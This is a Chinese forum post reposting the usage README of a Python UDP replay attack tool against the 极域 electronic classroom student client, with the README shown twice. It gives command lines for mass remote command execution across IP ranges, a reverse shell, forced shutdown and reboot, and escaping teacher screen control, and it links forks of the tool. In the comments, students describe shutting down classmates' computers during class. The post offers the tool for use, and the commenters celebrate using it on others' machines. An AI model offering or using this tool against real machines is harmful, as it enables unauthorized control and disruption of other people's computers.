极域电子教室数据包(udp)重放攻击脚本 - 趣小组

极域电子教室数据包(udp)重放攻击脚本

Tony 218.4m • 2021-04-04 • 3928 次点击 • 1 人收藏 • 2 人感谢

https://github.com/ht0Ruial/Jiyu_udp_attack
> 因为极域的学生端没有对接收到的udp包做(=・ω・=)身份验证，导致了我们可以构造特定的数据包让学生端来执行，从而实现命令执行攻击机房内上线的任意学生端机器。

~~貌似不能攻击老师的电脑，有点遗憾 ![](https://gitee.com/iamsjy/smzdm-pic/raw/master/23.png)~~
## 运行环境
+ Python3

（机房电脑运行环境刚好满足）
## 使用方法：
```
usage:

------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack

[-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {‌‌‌‌r,s,g,nc,break,continue}]
       {‌‌‌‌r,s,g,nc,break,continue} ...

positional arguments:
  {‌‌‌‌r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项，获取当前的ip地址以及学生端监听的端口
    nc                  独立选项，反弹shell的机器需出网，退出可使用命令exit
    break               独立选项，脱离屏幕控制，需要管理员权限
    continue            独立选项，恢复屏幕控制

optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口，默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数，默认为1
  -t T                  循环时间间隔，默认是22秒
  -e {‌‌‌‌r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg：-e r
          
```

## 使用例子

### Tips:
使用 **-ip** 参数指定目标IP时，可以有以下几种指定方式：
- 指定单个IP，如  192.168.80.12
- 指定IP范围，如 192.168.80.10-56
- 指定IP所在C段，如 192.168.80.1/24

### 1.获取内网ip地址及监听的端口
若学生端监听端口不是默认的**4705**，则在后续操作过程中需使用 **-p** 参数指定端口
```
python Jiyu_udp_attack.py -e g
```

### 2.脱离屏幕控制
当前运行权限需为管理员权限，主要用于开启MpsSvc服务
```
python Jiyu_udp_attack.py -e break
```

### 3.恢复屏幕控制
```
python Jiyu_udp_attack.py -e continue
```

### 4.发送消息
若学生端监听端口为**4705**，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

```

若学生端监听端口为**4605**，需使用 **-p** 参数指定端口，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

```

### 5.执行命令
给192.168.80.12到192.168.80.137弹一个计算器
```
python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe
```

### 6.反弹shell
反弹shell时，IP只能为某个机器IP，不能批量反弹，而且机器需要出网<br>
因为已经实现批量的任意命令执行，考虑到批量反弹也没啥意义，遂不添加
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc
```

### 7.关机重启
关机
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e s
```
重启
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e r
```

### 8.循环
利用循环持续发送消息<br>
1-254的机器会收到一条"hello,baby!"的消息，50s后会继续执行，共执行3次
```
python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50
```

https://github.com/ht0Ruial/Jiyu_udp_attack
> 因为极域的学生端没有对接收到的udp包做(=・ω・=)身份验证，导致了我们可以构造特定的数据包让学生端来执行，从而实现命令执行攻击机房内上线的任意学生端机器。

~~貌似不能攻击老师的电脑，有点遗憾 ![](https://gitee.com/iamsjy/smzdm-pic/raw/master/23.png)~~
## 运行环境
+ Python3

（机房电脑运行环境刚好满足）
## 使用方法：
```
usage:

------------------- Github Repositories -------------------
https://github.com/ht0Ruial/Jiyu_udp_attack

[-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
[-e {‌‌‌‌r,s,g,nc,break,continue}]
{‌‌‌‌r,s,g,nc,break,continue} ...

positional arguments:
{‌‌‌‌r,s,g,nc,break,continue}
-e 参数的详细说明
r reboot 重启
s shutdown 关机
g 独立选项，获取当前的ip地址以及学生端监听的端口
nc 独立选项，反弹shell的机器需出网，退出可使用命令exit
break 独立选项，脱离屏幕控制，需要管理员权限
continue 独立选项，恢复屏幕控制

optional arguments:
-h, --help show this help message and exit
-ip IP ip 指定目标IP地址
-p P port 指定监听端口，默认端口为4705
-msg MSG send_message发送消息 eg: -msg "HelloWord!"
-c C command命令 eg: -c "cmd.exe /c ipconfig"
-l L 循环次数，默认为1
-t T 循环时间间隔，默认是22秒
-e {‌‌‌‌r,s,g,nc,break,continue}
Extra Options加载额外的选项 eg：-e r

```

## 使用例子

### Tips:
使用 **-ip** 参数指定目标IP时，可以有以下几种指定方式：
- 指定单个IP，如 192.168.80.12
- 指定IP范围，如 192.168.80.10-56
- 指定IP所在C段，如 192.168.80.1/24

### 1.获取内网ip地址及监听的端口
若学生端监听端口不是默认的**4705**，则在后续操作过程中需使用 **-p** 参数指定端口
```
python Jiyu_udp_attack.py -e g
```

### 2.脱离屏幕控制
当前运行权限需为管理员权限，主要用于开启MpsSvc服务
```
python Jiyu_udp_attack.py -e break
```

### 3.恢复屏幕控制
```
python Jiyu_udp_attack.py -e continue
```

### 4.发送消息
若学生端监听端口为**4705**，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

```

若学生端监听端口为**4605**，需使用 **-p** 参数指定端口，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

```

### 5.执行命令
给192.168.80.12到192.168.80.137弹一个计算器
```
python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe
```

### 6.反弹shell
反弹shell时，IP只能为某个机器IP，不能批量反弹，而且机器需要出网<br>
因为已经实现批量的任意命令执行，考虑到批量反弹也没啥意义，遂不添加
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc
```

### 7.关机重启
关机
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e s
```
重启
```
python Jiyu_udp_attack.py -ip 192.168.80.12 -e r
```

### 8.循环
利用循环持续发送消息<br>
1-254的机器会收到一条"hello,baby!"的消息，50s后会继续执行，共执行3次
```
python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50
```

收藏 ♥ 感谢

沐风MWind 63.05m 2021-04-04

这“hello baby”多损呐

mike 25.1m 2021-04-05

我们老师可能看到这个又懵了

Tony 218.4m 2021-04-05

@mike 同学们可能会发现自己的电脑莫名其妙地关机了，老师傻了

mike 25.1m 2021-04-10

@Tony 我这周刚试了一下，真的......

Tony 218.4m 2021-04-10

@mike 然后发生了什么？

mike 25.1m 2021-04-11

@Tony 我们班全体(和谐)

Tony 218.4m 2021-04-16

@Tony 今天课上试了一下，还真能关电脑...

Spoony 小组长 2021-04-16

@Tony 然后被带到教务处了

Tony 218.4m 2021-04-16

@Spoony （是信息课上）两个同学一脸懵『我电脑怎么自己关了』

mike 25.1m 2021-04-17

@Tony 我本人是电脑室管理员，所以没有担心被打。反弹shell考虑写个不用出网的版本。

Tony 218.4m 2021-04-30

作者删库了，可以用人家fork的
https://github.com/26264484/Jiyu_udp_attack

Tony 218.4m 2021-04-30 ♥ 1

不光库没了，人都没了...

Tony 218.4m 2021-04-30

已重新上传 release
https://github.com/hmsjy2017/Jiyu_udp_attack/releases/tag/v1.4

Tony 218.4m 2021-09-29

@mike 写了吗？

登录或注册后可回复。

› 创客百宝箱